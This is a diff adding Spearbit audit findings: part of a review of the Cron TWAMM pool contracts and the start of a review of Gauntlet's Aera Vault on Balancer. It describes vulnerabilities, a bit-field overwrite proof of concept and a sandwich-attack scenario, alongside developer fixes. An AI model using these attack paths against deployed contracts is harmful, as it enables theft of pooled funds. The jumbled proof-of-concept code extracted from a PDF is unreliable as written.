+5.2.10 Incomplete token simulation in CronV1Pool due to missing queryJoin and queryExit functions Severity: Low Risk Context: CronV1Pool.sol#L76 Description: The CronV1Pool contract is missing the queryJoin and queryExit functions, which are significant for calculating maxAmountsIn and/or minBptOut on pool joins, and minAmountsOut and/or maxBptIn on pool exits, respectively. The ability to calculate these values is very important in order to ensure proper enforcement of slippage tolerances and mitigate the risk of sandwich attacks. Recommendation: It is recommended to consider adapting the queryJoin and queryExit functions in the CronV1Pool contract. Twamm: Sandwich protection for join (and testing for exit) was added as a mitigation for the "Overpayment of one side of LP Pair onJoinPool due to sandwich or user error" finding. The team will add queryJoin/queryExit in periphery contracts. Spearbit: Verified.
+5.2.11 A partner can trigger ROC update Severity: Low Risk Context: CronV1Pool.sol#L1073 Description: A partner can trigger a Rook update if they return Rook's current list within an update.
• Scenario: A partner calls updateArbitrageList, the IArbitrageurList(currentList).nextList() returns Rook's rookPartnerContractAddr and gets updated; the partner then calls updateArbitrageList again, so this time isRook will be true. Recommendation: Consider adding a check that reverts if the partner returns rookPartnerContractAddr. Twamm: Addressed in commit 850eb42 by removing the Rook specific implementation. Spearbit: Verified.
+5.2.12 Approved relayer can steal cron's fees Severity: Low Risk Context: CronV1Pool.sol#L1826 Description: A relayer within Balancer is set per vault per address. If feeAddr ever adds a relayer within the Balancer vault, the relayer can call exitPool with a recipient of their choice, and the check on line 225 will pass, as the sender will still be feeAddr but the true msg.sender is the relayer. Recommendation: Consider setting as feeAddr a multisig between trusted parties to limit the possibility of approving a relayer within the Balancer Vault for the feeAddr. There is no immediate action that can be taken, as the approved relayer functionality is part of the Balancer functionality. Twamm: The feeAddr will be an address controlled by a multisig. No additional logic will be introduced in the smart contract to prohibit relayers, as this would force the feeAddr wallet to be an EOA and limit usability. Spearbit: Acknowledged.
+5.2.13 Price Path Due To Long-Term Orders Neglected In Oracle Updates Severity: Low Risk Context: CronV1Pool.sol#L1564 Description: The _updateOracle() function takes its price sample as the final price after virtual order execution for whatever time period has elapsed since the last join/exit/swap. Since the price changes continuously during that interval if there are long-term orders active (unlike in Uniswap v2, where the price is constant between swaps), this is inaccurate: strictly speaking, one should integrate over the price curve as defined by LT orders to get a correct sample. The longer the interval, the greater the potential for inaccuracy. Recommendation: Consider accumulating oracle updates within the virtual order execution loop, or at least clearly document the potential for tracking errors in prices. Twamm: Fixed in commit b2339e6, commit 2b48f50, and commit 08f96a1. Spearbit: Verified.
+5.2.14 Vulnerabilities noted from npm audit Severity: Low Risk Context: package.json#L37-L81 Description: npm audit notes: 76 vulnerabilities (5 low, 16 moderate, 27 high, 28 critical). Recommendation: Remove any unused dependencies and update or patch them elsewhere. Twamm: Resolved prod issues with npm audit fix --only=prod in commit 8bd2644. Spearbit: Fixed.
5.3 Gas Optimization
+5.3.1 Optimization: Merge CronV1Pool.sol & VirtualOrders.sol (Changes from dev team added to audit.) Severity: Gas Optimization Context: CronV1Pool.sol#L29 Description: A lot of needless parameter passing is done to accommodate the file barrier between CronV1Pool & VirtualOrdersLib, which is an internal library. Some parameters are actually immutable variables. Recommendation: Merging these two files and removing extra members from the ExecuteVirtualOrdersMem struct will reduce gas use and contract size. Twamm: Addressed in commit 0d14f0a. Spearbit: Verified.
+5.3.2 Receive sorted tokens at creation to reduce complexity Severity: Gas Optimization Context: CronV1Pool.sol#L491 Description: Currently, when a pool is created, logic within the constructor determines whether the tokens are sorted by address, a requirement for Balancer Pool creation.
This logic adds unnecessary gas consumption and complexity throughout the contract, as every time amounts are retrieved from Balancer, the Cron Pool must check the order of the tokens and make sure that the difference between sorted (Balancer) and unsorted (Cron) token addresses is handled. An example can be seen in onJoinPool: uint256 token0InU112 = amountsInU112[TOKEN0_IDX]; uint256 token1InU112 = amountsInU112[TOKEN1_IDX]; Here amountsInU112 is retrieved from Balancer as a sorted array (index 0 == token0 and index 1 == token1), but on the Cron side we must make sure that the correct amount is retrieved, based on whether the tokens were sent sorted or not when the pool was created. Recommendation: Make an explicit requirement within the constructor for the tokens to be sorted: require(address(_token0Inst) < address(_token1Inst), ....); Twamm: Resolved in commit 26058f77. Spearbit: Verified.
+5.3.3 Remove double reentrancy checks Severity: Gas Optimization Context: CronV1Pool.onSwap, CronV1Pool.onJoinPool, CronV1Pool.onExitPool Description: A number of CronV1Pool functions include reentrancy checks; however, they are only callable from a Balancer Vault function that already has a reentrancy check. Recommendation: Exercise caution, as changes to either Balancer or Cron may re-introduce risks. In cases where the only entry point to a CronV1Pool function is a Balancer Vault and the vault's function includes a nonReentrant modifier, the extra nonReentrant modifier on the CronV1Pool function may be removed. Twamm: Addressed in commit 756576a and commit 731059b. Spearbit: Verified.
+5.3.4 TWAMM Formula Computation Can Be Made Correct-By-Construction and Optimized Severity: Gas Optimization Context: VirtualOrders.sol#L331-L336 Description: The linked lines are the core calculation of TWAMM virtual order execution. They involve checked arithmetic in the form of underflow-checked subtractions; there is thus a theoretical risk that rounding error could lead to a "freezing" of a TWAMM pool. One of the subtractions, that for token1OutU112, is already "correct-by-construction", i.e. it can never underflow. The calculation of token0OutU112 can be reformulated to be explicitly safe as well; the following overall refactoring is suggested: uint256 ammEndToken0 = (token1ReserveU112 * sum0) / sum1; uint256 ammEndToken1 = (token0ReserveU112 * sum1) / sum0; token0ReserveU112 = ammEndToken0; token1ReserveU112 = ammEndToken1; token0OutU112 = sum0 - ammEndToken0; token1OutU112 = sum1 - ammEndToken1; Both output calculations are now of the form x - (x * y) / (y + z) for non-negative x, y, and z, allowing the subtraction operations to be unchecked, which is both a gas optimization and gives confidence that the calculation cannot freeze up unexpectedly due to an underflow. Replacement of divDown by / gives equivalent semantics with lower overhead. An additional advantage of this formulation is its manifest symmetry under 0 <-> 1 interchange; this serves as a useful heuristic check on the computation, as it should possess the same symmetry as the invariant. Recommendation: Reformulate as suggested above or in an analogous fashion. Twamm: Fixed in commit eb957842. Spearbit: Verified.
+5.3.5 Gas Optimizations In Bit Packing Functions Severity: Gas Optimization Context: BitPacking.sol Description: The bit packing operations are heavily used throughout the gas-critical swap code path, the optimization of which was flagged as high-priority by the CronFi team.
Thus they were carefully reviewed not just for correctness, but also for gas optimization: L119: unnecessary & due to check on L116; L175: could hardcode clearMask; L203: could hardcode clearMask; L240: could hardcode clearMask; L241: unnecessary & due to check on line 237; L242: unnecessary & due to check on line 238; L292: could hardcode clearMask; L328: could hardcode clearMask; L343: unnecessary to mask when _isWord0 == true; L359: unnecessary & operations due to checks on lines 356 and 357; L372: unnecessary masking; L389: could hardcode clearMask; L390: unnecessary & due to check on L387; L415: could hardcode clearMask; L416: unnecessary & operation due to check on line 413; L437: unnecessary clearMask; L438: unnecessary & due to check on line 435; L464: could hardcode clearMask; L465: unnecessary & due to check on line 462. Additionally, the following code pattern appears in multiple places: requireErrCode(increment <= CONST, CronErrors.INCREMENT_TOO_LARGE); value += increment; requireErrCode(value <= CONST, CronErrors.OVERFLOW); Unless there's a particular reason to want to detect a too-large increment separately from an overflow, these patterns could all be simplified to requireErrCode(CONST - value >= increment, CronErrors.OVERFLOW); value += increment; as any increment greater than CONST will cause an overflow anyway and value is always in the correct range by construction. This allows CronErrors.INCREMENT_TOO_LARGE to be removed as well. Recommendation: If desired, these small optimizations can be made safely. Twamm: Fixed in commit cf80681. Error code optimization implemented as suggested, except for the incrementPairWithClampU96 method, where absolute overflow of the container (U256) is checked instead of U96, because the clamping action would be subverted if the check were against MAX_U96. Measured contract size reduced by 187 bytes. Spearbit: Verified.
+5.3.6 Using extra storage slot to store two mappings of the same information Severity: Gas Optimization Context: CronV1PoolFactory.sol#L69 Description: A second storage slot is used to store a duplicate mapping of the same token pair but in reverse order. If the tokens are sorted in a getter function, then the second mapping does not need to be used. Recommendation: Remove the use of the second mapping and create a getter function that sorts the tokens before returning the mapping entry (a sketch follows 5.3.7 below). Alternatively, if CREATE2 were used, a pool's deployment address could be computed directly. Twamm: Resolved in commit 26058f7. Spearbit: Fixed.
+5.3.7 Gas optimizations within _executeVirtualOrders function Severity: Gas Optimization Context: CronV1Pool.sol#L1519:L1569 Description: Within the _executeVirtualOrders function there are a few gas optimizations that can be applied to reduce the contract size and the gas consumed when the function is called. (!(virtualOrders.lastVirtualOrderBlock < _maxBlock && _maxBlock < block.number)) is equivalent to: (virtualOrders.lastVirtualOrderBlock >= _maxBlock || _maxBlock >= block.number) This means the branch is always entered if _maxBlock == block.number, which results in unnecessary gas consumption. If the cron fee is enabled, evoMem.feeShiftU3 will have a value, meaning the check on line 1536 is obsolete; removing that check and the storage read will save gas. Recommendation: Consider implementing the above gas optimizations. Twamm: Resolved in commit 3ae7fce and commit 6826034. Spearbit: Verified.
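A sketch of the single-mapping getter suggested in 5.3.6 above (storage layout and names are illustrative):

// SPDX-License-Identifier: MIT
pragma solidity ^0.7.0;

contract PoolRegistrySketch {
    // one slot per pair: keys are always stored with token0 < token1
    mapping(address => mapping(address => mapping(uint256 => address))) internal pools;

    function getPool(address tokenA, address tokenB, uint256 poolType) external view returns (address) {
        // sort on read so callers may pass the tokens in either order
        (address token0, address token1) = tokenA < tokenB ? (tokenA, tokenB) : (tokenB, tokenA);
        return pools[token0][token1][poolType];
    }
}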
+5.3.8 Initializing with default value is consuming unnecessary gas Severity: Gas Optimization Context: CronV1Pool.sol#L2102 Description: Every variable declaration followed by initialization with its default value consumes gas and is obsolete. The provided line within the context is just an example. Recommendation: Consider going through the contracts and deleting any default initialization to save gas. Twamm: Addressed. Spearbit: Verified.
+5.3.9 Factory requirement can be circumvented within the constructor Severity: Gas Optimization Context: CronV1Pool.sol#L484 Description: The constructor checks if the _factory parameter is the msg.sender. This behavior was, at first, created so that only the factory would be able to deploy pools. The check on line 484 is obsolete, as pools deployed via the factory will always have msg.sender == factory address, making the _factory parameter obsolete as well. Recommendation: Consider whether it is necessary to include this check, and just set the FACTORY as msg.sender to save gas. Twamm: Addressed in commit 26058f7. Spearbit: Verified.
5.4 Informational
+5.4.1 Usability: added remove, set pool functionality to CronV1PoolFactory (Changes from dev team added to audit.) Severity: Informational Context: CronV1PoolFactory.sol#L49 Description: Conversations with the audit team indicated functions were needed to manage pool mappings post-creation in the event that a pool needed to be deprecated or replaced. Recommendation: Add a set and remove function to accomplish this. Twamm: Addressed in commit bad2211. Spearbit: Verified.
+5.4.2 Virtual oracle getter: gets oracle value at block > lvob (Changes from dev team added to audit.) Severity: Informational Context: CronV1Pool.sol#L274 Description: Through the audit process, sufficient contract space became available to add an oracle getter convenience that returns the oracle values and timestamps. However, this leaves the problem of not being able to get the oracle price at the current block in a pool with low volume but virtual orders active. Recommendation: Introduce a way to get the virtual value of the oracle at a specified block number. Twamm: Addressed in commit 2b48f50. Spearbit: Verified.
+5.4.3 Loss of assets due to rounding during _longTermSwap Severity: Informational Context: CronV1Pool.sol#L1752 Description: When a long term swap (LT) is created, the selling rate for that LT is set based on the amount and the number of blocks that order will be traded for. uint256 lastExpiryBlock = block.number - (block.number % ORDER_BLOCK_INTERVAL); uint256 orderExpiry = ORDER_BLOCK_INTERVAL * (_orderIntervals + 1) + lastExpiryBlock; // +1 protects from div 0 uint256 tradeBlocks = orderExpiry - block.number; uint256 sellingRateU112 = _amountInU112 / tradeBlocks; During the computation of the number of blocks the order must trade for, defined as tradeBlocks, the order expiry is computed from the last expiry block based on the OBI (Order Block Interval). If tradeBlocks is big enough (it can be at most 176102 based on STABLE_MAX_INTERVALS), then sellingRateU112 will suffer a loss due to Solidity's rounding-down behavior. This is a manageable loss for tokens with many decimals, but for tokens with few decimals it will create quite an impact: e.g. wrapped BTC has 8 decimals, and MAX_ORDER_INTERVALS can be at most 176102 as per the stable max intervals defined within the constants.
That being said, a user can lose a non-trivial amount of BTC: up to 0.00176101. This issue is marked as Informational severity as the amount lost might not be that significant; this can change in the future if the token being LTed has a high value and a small number of decimals. Recommendation: Consider making this as transparent as possible to users via the frontend; additional documentation might help as well when 3rd parties want to integrate with the Cron Pool. Twamm: Acknowledged. Spearbit: Acknowledged.
+5.4.4 Inaccuracies in Comments Severity: Informational Context: [1] BitPacking.sol#L52 [2] BitPacking.sol#L325 [3] JoinEventLib.sol#L16 [4] CronV1Pool.sol#L456 [5] Structs.sol#L193-L194 [6] VirtualOrders.sol#L64-L66 [7] VirtualOrders.sol#L123-124 [8] CronV1Pool.sol#L349 Description: A number of minor inaccuracies were discovered in comments that could impact the comprehensibility of the code to future maintainers, integrators, and extenders. [1] bit-0 should be bit-1. [2] less than should be at most. [3] Maximally Extracted Value should be Maximal Extractable Value, see flashbots.net. [4] Maximally Extracted Value should be Maximal Extractable Value, see flashbots.net. [5] On these lines, unsold should be sold. [6] These comments are not applicable to the code block below them, as they mention looping but no looping is done; it seems they were copied over from the loop on line 54. [7] These comments are not applicable to the code block below them, as they mention looping but no looping is done; it seems they were copied over from the loop on line 111. [8] omitted should be emitted. Recommendation: Correct or otherwise fix the indicated issues in the comments. Twamm: [1] addressed in commit cf80681 [2] addressed in commit cf80681 [3] addressed in commit 0e2cc05; also, join events removed [4] addressed in commit ec2d92b [5] addressed in commit c903d4d [6] addressed in commit d632f85 [7] addressed in commit d632f85 [8] addressed in commit b1e11d6 Spearbit: Verified.
+5.4.5 Unsupported SwapKind.GIVEN_OUT may limit the compatibility with Balancer Severity: Informational Context: CronV1Pool.sol#L599 Description: The Balancer protocol utilizes two types of swaps for its functionality: GIVEN_IN and GIVEN_OUT. • GIVEN_IN specifies the minimum amount of tokens a user would accept to receive from the swap. • GIVEN_OUT specifies the maximum amount of tokens a user would accept to send for the swap. However, the onSwap function of the CronV1Pool contract only accepts the IVault.SwapKind.GIVEN_IN value as the IVault.SwapKind field of the SwapRequest struct. The unsupported SwapKind.GIVEN_OUT may limit compatibility with Balancer's Batch Swaps and Smart Order Router functionality, as a single SwapKind is given as an argument. Recommendation: In order to increase compatibility with Balancer, it is recommended to include support for the SwapKind.GIVEN_OUT functionality in the onSwap function. Twamm: Acknowledged. Spearbit: Acknowledged.
+5.4.6 A pool's first LP will always take a minor loss on the value of their liquidity Severity: Informational Context: CronV1Pool.sol#L2046 Description: The first liquidity provider for a pool will always take a small loss on the value of the tokens they deposit into the pool, because 1000 balancer pool tokens are minted to the zero address on the initial deposit. As most tokens have 18 decimal places, this value would be negligible in most cases; however, for tokens with a high value and small decimals the effects may be more apparent.
Recommendation: Document and ensure this behavior is known. Another option is to make the minimum liquidity configurable. Twamm: A warning has been written in the contract's comments. Addressed in commit 839ee51. Spearbit: Verified.
+5.4.7 The _withdrawCronFees function should revert if there are no fees to withdraw Severity: Informational Context: CronV1Pool.sol#L1840 Description: The _withdrawCronFees function checks whether there are any Cron fees that need to be withdrawn; currently, this function does not revert when there are no fees. Recommendation: We recommend reverting when there are no fees to withdraw; this will prevent unnecessary gas consumption if an admin calls this function. Twamm: Addressed in commit c4dfaa9. Spearbit: Verified.
+5.4.8 Extend the functionality of getVirtualReserves function Severity: Informational Context: CronV1Pool.sol#L1250 Description: The getVirtualReserves function is a critical function within the Cron Pool. We recommend expanding this function a bit in order to make it more useful for 3rd parties integrating with the pool. One suggestion: the function is not parametrized with a block number; in case something happens and this function runs out of gas because block.number - LVOB is too big, a block number parameter can at least save on debugging. A second suggestion is to add an extra parameter for the isPaused requirement, as even if the pool is paused,
diff --git a/findings_newupdate/spearbit/Gauntlet-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Gauntlet-Spearbit-Security-Review.txt new file mode 100644 index 0000000..0f2b431 --- /dev/null +++ b/findings_newupdate/spearbit/Gauntlet-Spearbit-Security-Review.txt @@ -0,0 +1,55 @@
+5.1.1 Important Balancer fields can be overwritten by EndTime Severity: Critical Risk Context: ManagedPool.sol#L75-L77, ManagedPool.sol#L84-L86, LegacyBasePool.sol, WordCodec.sol Description: Balancer's ManagedPool uses 32 bit values for startTime and endTime but it does not verify that those values fit within that range. The values are stored in a 32-byte _miscData slot in BasePool via the insertUint32() function. However, this function does not strip any excess bits, resulting in other fields stored in _miscData being overwritten. In the version that Aera Vault uses, only the "restrict LP" field can be overwritten, and by carefully crafting the value of endTime, the "restrict LP" boolean can be switched off, allowing anyone to use joinPool. The Manager could cause this behavior via the updateWeightsGradually() function, while the Owner could do it via enableTradingWithWeights(). Note: This issue has been reported to Balancer by the Spearbit team. contract ManagedPool is BaseWeightedPool, ReentrancyGuard { // f14de92ac443d6daf1f3a42025b1ecdb8918f22e // [ 119 bits | 1 bit | 32 bits | 32 bits | 7 bits | 1 bit | 64 bits ] // [ unused | restrict LP | end time | start time | total tokens | swap flag | reserved ] // |MSB LSB| function _startGradualWeightChange(uint256 startTime, uint256 endTime, ... ) ... { ... _setMiscData( _getMiscData().insertUint32(startTime, _START_TIME_OFFSET).insertUint32(endTime, _END_TIME_OFFSET) ); // this converts the values to 32 bits ...
} } In the latest version of ManagedPool many more fields can be overwritten, including: • LP flag • Fee end/Fee start • Swap flag contract ManagedPool is BaseWeightedPool, AumProtocolFeeCache, ReentrancyGuard { // current version // [ 64 bits ] // [ swap fee | LP flag | fee end | swap flag | fee start | end swap | end wgt | start wgt ] LSB| // |MSB 1 bit | 31 bits | | 31 bits 32 bits | 64 bits | 32 bits 1 bit | | The following POC shows how fields can be manipulated. // SPDX-License-Identifier: MIT pragma solidity ^0.8.13; import "hardhat/console.sol"; contract checkbalancer { uint256 private constant _MASK_1 = 2**(1) - 1; uint256 private constant _MASK_31 = 2**(31) - 1; uint256 private constant _MASK_32 = 2**(32) - 1; uint256 private constant _MASK_64 = 2**(64) - 1; uint256 private constant _MASK_192 = 2**(192) - 1; 5 | | 1 bit 64 bits | | 31 bits 1 bit | 31 bits | // [ 64 bits ] // [ swap fee | LP flag | fee end | swap flag | fee start | end swap | end wgt | start wgt ] LSB| // |MSB uint256 private constant _WEIGHT_START_TIME_OFFSET = 0; uint256 private constant _WEIGHT_END_TIME_OFFSET = 32; uint256 private constant _END_SWAP_FEE_PERCENTAGE_OFFSET = 64; uint256 private constant _FEE_START_TIME_OFFSET = 128; uint256 private constant _SWAP_ENABLED_OFFSET = 159; uint256 private constant _FEE_END_TIME_OFFSET = 160; uint256 private constant _MUST_ALLOWLIST_LPS_OFFSET = 191; uint256 private constant _SWAP_FEE_PERCENTAGE_OFFSET = 192; 32 bits | 32 bits function insertUint32(bytes32 word,uint256 value,uint256 offset) internal pure returns (bytes32) { bytes32 clearedWord = bytes32(uint256(word) & ~(_MASK_32 << offset)); return clearedWord | bytes32(value << offset); } function decodeUint31(bytes32 word, uint256 offset) internal pure returns (uint256) { return uint256(word >> offset) & _MASK_31; } function decodeUint32(bytes32 word, uint256 offset) internal pure returns (uint256) { return uint256(word >> offset) & _MASK_32; } function decodeUint64(bytes32 word, uint256 offset) internal pure returns (uint256) { return uint256(word >> offset) & _MASK_64; } function decodeBool(bytes32 word, uint256 offset) internal pure returns (bool) { return (uint256(word >> offset) & _MASK_1) == 1; } function insertBits192(bytes32 word,bytes32 value,uint256 offset) internal pure returns (bytes32) { bytes32 clearedWord = bytes32(uint256(word) & ~(_MASK_192 << offset)); return clearedWord | bytes32((uint256(value) & _MASK_192) << offset); } constructor() { bytes32 poolState; bytes32 miscData; uint startTime = 1 + 2*2**32; uint endTime = 3 + 4*2**32 + 5*2**(32+64) + 2**(32+64+31) + 6*2**(32+64+31+1) + ,! 2**(32+64+31+1+31) + 7*2**(32+64+31+1+31+1); poolState = insertUint32(poolState,startTime, _WEIGHT_START_TIME_OFFSET); poolState = insertUint32(poolState,endTime, _WEIGHT_END_TIME_OFFSET); miscData = insertBits192(miscData,poolState,0); decodeUint32(miscData, console.log("startTime", console.log("endTime", decodeUint32(miscData, console.log("endSwapFeePercentage", decodeUint64(miscData, _WEIGHT_START_TIME_OFFSET)); // 1 // 3 _WEIGHT_END_TIME_OFFSET)); _END_SWAP_FEE_PERCENTAGE_OFFSET)); ,! // 4 console.log("Fee startTime", console.log("Swap enabled", console.log("Fee endTime", console.log("AllowlistLP", decodeUint31(miscData, decodeBool(miscData, decodeUint31(miscData, decodeBool(miscData, _FEE_START_TIME_OFFSET)); // 5 _SWAP_ENABLED_OFFSET)); // true _FEE_END_TIME_OFFSET)); // 6 _MUST_ALLOWLIST_LPS_OFFSET)); // ,! 
Gauntlet: Recommendation implemented in PR #145.
Spearbit: Acknowledged. Recommendation has been implemented.

+5.1.2 sweep function should prevent Treasury from withdrawing pool's BPTs
Severity: Critical Risk
Context: AeraVaultV1.sol#L559-L561
Description: The current sweep() implementation allows the vault owner (the Treasury) to sweep any token owned by the vault, including BPTs (Balancer Pool Tokens) that were minted to the Vault during the pool's initialDeposit() call. The current vault implementation does not need those BPTs to withdraw funds, because withdrawals go directly through the AssetManager flow via withdraw()/finalize(). Being able to withdraw BPTs would allow the Treasury to:
• Withdraw funds without respecting the time period between initiateFinalization() and finalize() calls.
• Withdraw funds without respecting the Validator's allowance() limits.
• Withdraw funds without paying the manager's fee for the last withdraw().
• finalize the pool, withdrawing all funds and selling the then-valueless BPTs on the market.
• Sell or rent out BPTs and withdraw() funds afterwards, thus doubling the funds.
Swap fees would not be paid, because the Treasury could call setManager(newManager), where the new manager is someone controlled by the Treasury, and subsequently call setSwapFee(0) to remove the swap fee that would otherwise be applied during an exitPool() event.
Note: Once the BPT is retrieved it can also be used to call exitPool(), as the mustAllowlistLPs check is ignored in exitPool().
Recommendation: Add a check on the token input parameter to prevent the Treasury from withdrawing the pool's BPT tokens.
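A sketch of such a check; the reduced contract and error name are hypothetical, assuming the pool (which is itself the BPT) is stored in an immutable, and OpenZeppelin 4.x:

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
    import "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";
    import "@openzeppelin/contracts/access/Ownable.sol";

    // Hypothetical, reduced vault showing only the guarded sweep.
    contract SweepGuardSketch is Ownable {
        using SafeERC20 for IERC20;

        error Aera__CannotSweepPoolToken();

        address public immutable pool; // the ManagedPool, which is itself the BPT

        constructor(address pool_) {
            pool = pool_;
        }

        function sweep(address token, uint256 amount) external onlyOwner {
            // Refuse to sweep the pool's own BPT out of the vault.
            if (token == pool) revert Aera__CannotSweepPoolToken();
            IERC20(token).safeTransfer(owner(), amount);
        }
    }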
Gauntlet: Fixed in PR #132.
Spearbit: Acknowledged.

5.2 High Risk

+5.2.1 Manager can cause an immediate weight change
Severity: High Risk
Context: ManagedPool.sol#L254-L272, ManagedPool.sol#L620-L654, ManagedPool.sol#L680-L698
Description: Balancer's ManagedPool uses 32-bit values for startTime and endTime but does not verify that those values fit within that range. When endTime is set to 2**32 it is larger than startTime, so the _require(startTime <= endTime, ...) statement will not revert. When endTime is then truncated to 32 bits it gets a value of 0, so in _calculateWeightChangeProgress() the test if (currentTime >= endTime) ... will be true, causing the weight to immediately reach its end value. This way the Manager can cause an immediate weight change via the updateWeightsGradually() function and open arbitrage opportunities.
Note: startTime is also subject to this overflow problem.
Note: the same issues occur in the latest version of ManagedPool.
Note: This issue has been reported to Balancer by the Spearbit team.
Also see the following issues:
• Managed Pools are still undergoing development and may contain bugs and/or change significantly
• Important fields of Balancer can be overwritten by EndTime

    contract ManagedPool is BaseWeightedPool, ReentrancyGuard {
        function updateWeightsGradually(uint256 startTime, uint256 endTime, ... ) {
            ...
            uint256 currentTime = block.timestamp;
            startTime = Math.max(currentTime, startTime);
            _require(startTime <= endTime, Errors.GRADUAL_UPDATE_TIME_TRAVEL); // will not revert if endTime == 2**32
            ...
            _startGradualWeightChange(startTime, endTime, _getNormalizedWeights(), endWeights, tokens);
        }

        function _startGradualWeightChange(uint256 startTime, uint256 endTime, ... ) ... {
            ...
            _setMiscData(
                _getMiscData().insertUint32(startTime, _START_TIME_OFFSET).insertUint32(endTime, _END_TIME_OFFSET)
            ); // this converts the values to 32 bits
            ...
        }

        function _calculateWeightChangeProgress() private view returns (uint256) {
            uint256 currentTime = block.timestamp;
            bytes32 poolState = _getMiscData();
            uint256 startTime = poolState.decodeUint32(_START_TIME_OFFSET);
            uint256 endTime = poolState.decodeUint32(_END_TIME_OFFSET);
            if (currentTime >= endTime) { // will be true if endTime == 2**32, capped to 32 bits == 0
                return FixedPoint.ONE;
            } else ...
            ...
        }
    }

Recommendation: Make use of a ManagedPool.sol version which solves this issue. In the meantime, verify before pool.updateWeightsGradually() is called that:
• startTime <= type(uint32).max
• endTime <= type(uint32).max
Gauntlet: Recommendation implemented in PR #145.
Spearbit: Acknowledged.

+5.2.2 deposit and withdraw functions are susceptible to sandwich attacks
Severity: High Risk
Context: AeraVaultV1.sol#L402-L453, AeraVaultV1.sol#L456-L514
Description: Transactions calling the deposit() function are susceptible to sandwich attacks in which an attacker can extract value from deposits. A similar issue exists in the withdraw() function, but the minimum check on the pool holdings limits that attack's impact. Consider the following scenario (swap fees ignored for simplicity):
1. Suppose the Balancer pool contains two tokens, WETH and DAI, with weights 0.5 and 0.5. Currently there is 1 WETH and 3k DAI in the pool, and the WETH spot price is 3k.
2. The Treasury wants to add another 3k DAI into the Aera vault, so it calls the deposit() function.
3. The attacker front-runs the Treasury's transaction. They swap 3k DAI into the Balancer pool and get out 0.5 WETH. The weights remain 0.5 and 0.5, but because the WETH and DAI balances become 0.5 and 6k, WETH's spot price now becomes 12k.
4. Now the Treasury's transaction adds 3k DAI into the Balancer pool and updates the weights to 0.5*1.5 : 0.5 = 0.6 : 0.4.
5. The attacker back-runs the transaction and swaps the 0.5 WETH they got in step 3 back to DAI (recovering the WETH spot price to near, but above, 3k). According to the current weights they can get 9k*(1 - 1/r) = 3.33k DAI from the pool, where r = (2^0.4)^(1/0.6) (derived after this list).
6. As a result the attacker profits 3.33k - 3k = 0.33k DAI.
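For reference, the figure in step 5 follows from the standard weighted-pool out-given-in formula,

\[ A_o = B_o\left(1 - \left(\frac{B_i}{B_i + A_i}\right)^{w_i/w_o}\right), \]

with \(B_i = 0.5\) WETH, \(A_i = 0.5\) WETH, \(B_o = 9000\) DAI, \(w_i = 0.4\) and \(w_o = 0.6\):

\[ A_o = 9000\left(1 - 0.5^{0.4/0.6}\right) = 9000\left(1 - 2^{-2/3}\right) \approx 3330 \text{ DAI}, \]

which matches \(9000(1 - 1/r)\) with \(r = (2^{0.4})^{1/0.6} = 2^{2/3} \approx 1.587\).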
Recommendation: Potential mitigations include:
• Adopting a two-step deposit and withdraw model. First, disable trading and check that the pool's spot price is within range. If not, enable trading again and let arbitrageurs re-balance the pool. Once rebalanced, deposit to or withdraw from the pool. Then enable trading again (possibly with new weights).
• Avoiding deposits or withdrawals if the pool balance has changed in the same block. The lastChangeBlock variable stores the last block number in which the pool balance was modified. By ensuring lastChangeBlock is less than the current block number, same-block sandwich attacks can be prevented. Still, this mitigation does not prevent multi-block MEV attacks.
• Similar to slippage protection, adding price boundaries as parameters to the deposit() and withdraw() functions to ensure the pool's spot price is within boundaries before and after a deposit or withdrawal. Revert the transaction if the boundaries are not met.
• Using Flashbots to reduce sandwiching probabilities.
Gauntlet: As discussed, this is a problem with spot-price-agnostic depositing into an AMM. V2 will introduce oracle-informed spot price updates. We will take the following actions for V1:
• Advise treasuries against making large deposits.
• For sensitive/larger deposits, offer an option to reject the transaction if balances have been changed in the block (lastChangeBlock), implemented in PR #138.
• Advise treasuries to use Flashbots when possible.
Spearbit: Actions taken on a procedural and not technical level.

+5.2.3 allowance() doesn't limit withdraw()s
Severity: High Risk
Context: PermissiveWithdrawalValidator.sol#L17-L27, IWithdrawalValidator.sol, AeraVaultV1.sol#L456-L514
Description: The allowance() function is meant to limit withdraw amounts. However, allowance() can only read and not alter state, because its visibility is set to view. Therefore, the withdraw() function can be called on demand until the entire Vault/Pool balance has been drained, rendering the allowance() function ineffective.

    function withdraw(uint256[] calldata amounts) ... {
        ...
        uint256[] memory allowances = validator.allowance();
        ...
        for (uint256 i = 0; i < tokens.length; i++) {
            if (amounts[i] > holdings[i] || amounts[i] > allowances[i]) {
                revert Aera__AmountExceedAvailable(... );
            }
        }
    }

    // can't update state due to view
    function allowance() external view override returns (uint256[] memory amounts) {
        amounts = new uint256[](count);
        for (uint256 i = 0; i < count; i++) {
            amounts[i] = ANY_AMOUNT;
        }
    }

Recommendation: Remove the view keyword from the allowance() template, i.e. from both IWithdrawalValidator.sol and PermissiveWithdrawalValidator.sol, to be able to update state in future versions of allowance().
Gauntlet: I would say we need an additional callback to the Validator to notify it of actual withdraw amounts. In the case when the allowance is greater than the holdings, there is no way for the Validator to know how much of its allowance was actually used.
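As an illustration of a state-updating validator along these lines, a minimal sketch under the simplifying assumption of a single per-epoch cap; the contract and function names are hypothetical, and the audited interface returns per-token arrays instead:

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    // Hypothetical validator that can actually enforce its limit because the
    // vault reports consumed amounts through a non-view call.
    contract RateLimitedWithdrawalValidatorSketch {
        uint256 public immutable epochAllowance;
        uint256 public epochStart;
        uint256 public spentThisEpoch;

        constructor(uint256 epochAllowance_) {
            epochAllowance = epochAllowance_;
            epochStart = block.timestamp;
        }

        // Non-view: records how much of the allowance was actually used.
        function consumeAllowance(uint256 amount) external returns (bool allowed) {
            if (block.timestamp >= epochStart + 1 days) {
                epochStart = block.timestamp; // roll over to a new epoch
                spentThisEpoch = 0;
            }
            if (spentThisEpoch + amount > epochAllowance) return false;
            spentThisEpoch += amount;
            return true;
        }
    }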
+5.2.4 Managed Pools are still undergoing development and may contain bugs and/or significant changes
Severity: High Risk
Context: balancer-v2-monorepo
Description: The ManagedPool smart pool implementation of WeightedPool is still in active development by the Balancer team and could have unknown bugs. Additionally, the current version in Balancer's github is different from the version used in the Mannon Vault.
Note: The Gauntlet team has also flagged this as an issue.
Recommendation: Use the latest version of ManagedPool. Consider using new functionality like AUM (managementAumFeePercentage) fees. Also see the following issues:
